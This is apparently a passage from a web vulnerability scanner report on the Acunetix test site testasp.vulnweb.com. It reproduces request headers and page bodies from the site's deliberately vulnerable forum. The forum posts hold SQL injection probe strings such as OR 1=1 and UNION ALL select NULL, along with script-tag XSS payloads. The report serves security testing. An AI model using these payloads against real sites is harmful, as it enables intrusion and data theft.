bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 5979 |
| Response Body - size: 5,979 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div 